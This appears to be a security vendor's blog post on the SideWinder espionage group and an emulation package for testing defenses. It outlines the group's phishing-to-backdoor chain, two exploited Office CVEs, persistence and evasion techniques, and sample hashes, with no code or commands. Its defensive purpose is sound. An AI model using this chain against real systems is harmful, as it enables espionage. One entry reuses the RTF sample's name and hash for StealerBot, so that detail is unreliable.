SideWinder is a long-running threat actor active since at least 2012, primarily engaged in cyber-espionage. It has been observed targeting military and government entities, as well as ports and maritime facilities across the Indian Ocean and Mediterranean Sea, including Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal and the Maldives.

Initial access is typically obtained via spear-phishing emails containing malicious documents that mimic trusted organizations. These documents use a remote template injection technique (CVE-2017-0199) to retrieve an RTF that contains embedded shellcode exploiting CVE-2017-11882. The shellcode performs environment checks to detect virtualization or analysis systems; if the host is verified, it decodes and executes a small JavaScript payload fetched from a remote server. This payload connects to a malicious URL to retrieve additional malware stages or to exploit further vulnerabilities.

The delivery infrastructure exhibits a level of sophistication aimed at evading detection and hindering analysis: geofencing returns an empty RTF to non-targeted requests, delivery and payload URLs are short-lived and routinely rotated (often unique per campaign or target set), and servers generate payloads on the fly so each download produces a file with a unique hash. These measures together reduce the usefulness of static indicators and increase the difficulty of sample correlation and analysis.

The observed final payload, known as StealerBot, is a modular memory-resident backdoor designed for espionage. It operates entirely in memory, with decrypted components injected directly by the loader to avoid disk artifacts.

AttackIQ has released a new attack graph that emulates the Tactics, Techniques, and Procedures (TTPs) associated with the deployment of SideWinder to help customers validate their security controls and their ability to defend against this threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against baseline behaviors associated with SideWinder
• Assess their security posture against a prolific and sophisticated adversary.
• Continuously validate detection and prevention pipelines against a threat that conducts espionage campaigns across multiple sectors and regions.

Sidewinder – 2025-05 – Malicious Office Document Delivers StealerBot

This emulation replicates the sequence of behaviors associated with the deployment of SideWinder on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.

Initial Access & Execution – Malware Delivery

In this stage, a malicious Office document (.DOCX) is downloaded and saved to the system. Next, a Rich Text Format (.RTF) file is dropped and executed via mshta.exe. Finally, system memory is checked via GlobalMemoryStatusEx.

2025-05 SideWinder .DOCX Sample (T1105): The SideWinder .DOCX Sample (SHA256: 57b9744b30903c7741e9966882815e1467be1115cbd6798ad4bfb3d334d3523d) is downloaded to memory and saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

2025-02 SideWinder .RTF Sample (T1105): The SideWinder .RTF Sample (SHA256: d9e373aeea5fe0c744f0de94fdd366b5b6da816209ac394cbbda1c64c03b50b1) is saved to disk to test endpoint controls and their ability to prevent the delivery of known malicious samples.

Download and Execute Remote Payload with MSHTA (T1218.005): This scenario downloads and executes a remote Microsoft HTML Application (HTA) from an AttackIQ controlled webserver, that contains embedded Visual Basic Script (VBS) code to create a canary file in the compromised file system.

System Information Discovery via “GlobalMemoryStatusEx” Native API (T1082): This scenario executes the GlobalMemoryStatusEx Windows API call to gather information about physical and virtual memory.

Execution & Persistence – Malware Execution

In this stage, the Windows Management Instrumentation Command-line (WMIC) is executed to retrieve the list of antivirus products installed on the system. Next, a payload is executed using pcalua.exe. Finally, persistence is established through either scheduled tasks or registry run keys as a fallback.

Discover Security Software (AntiVirusProduct) using WMI Command (T1518.001): This scenario uses a native Windows Management Instrumentation Command-line (WMIC) to determine which software has been installed as an AntiVirusProduct class.

Indirect Command Execution using “pcalua.exe” Script (T1202): This scenario abuses the use of the Program Compatibility Assistant Service pcalua.exe to execute a file.

Persistence Through Scheduled Task (T1053.005): This scenario creates a new scheduled task for persistence using the schtasks utility.

Persistence Through Registry Run and RunOnce Keys (T1547.001): This scenario creates an entry under the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry key to be run at system startup and acquire persistence.

Execution – StealerBot Deployment

In this stage, the Backdoor Loader is deployed to the system. Then, DLL side-loading is performed. And finally, the unencrypted version of the StealerBot is dropped and saved to disk.

2024-12 SideWinder Backdoor Loader (vsstrace.dll) Sample (T1105): The SideWinder Backdoor Loader (vsstrace.dll) Sample (SHA256: 44ff1117bb0167f85d599236892deede636c358df3d8908582a6ce6a48070bd4) is downloaded to memory and saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

DLL Side-Loading (T1574.002): This scenario leverages a legitimate and trusted executable to load a malicious Dynamic-link Library (DLL).

2025-05 SideWinder StealerBot Unencrypted Sample (T1105): The SideWinder .RTF Sample (SHA256: d9e373aeea5fe0c744f0de94fdd366b5b6da816209ac394cbbda1c64c03b50b1) is saved to disk to test endpoint controls and their ability to prevent the delivery of known malicious samples.

Wrap-up

In summary, this emulation will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by SideWinder. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.